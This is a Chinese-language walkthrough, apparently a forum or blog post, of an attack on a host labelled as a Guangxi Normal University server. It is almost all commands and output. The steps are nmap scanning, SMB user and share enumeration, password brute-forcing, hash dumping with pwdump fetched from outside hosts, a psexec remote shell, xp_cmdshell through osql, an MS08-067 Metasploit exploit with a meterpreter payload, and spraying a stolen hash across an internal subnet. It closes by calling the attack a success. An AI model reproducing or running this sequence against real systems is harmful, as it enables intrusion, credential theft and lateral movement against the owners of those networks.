广西师范网站http://202.103.242.241/
root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
3372/tcp open msdtc?
3389/tcp open ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root 1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
//此乃使用脚本扫描远程机器所存在的账户名

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser //扫描结果

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
//查看共享

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
//获取用户密码

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.2418)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2 //抓hash
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
-p 123456 -e cmd.exe

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
//利用用户名跟获取的hash尝试对整段内网进行登录

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

攻击成功,一个简单的msf+nmap攻击~~·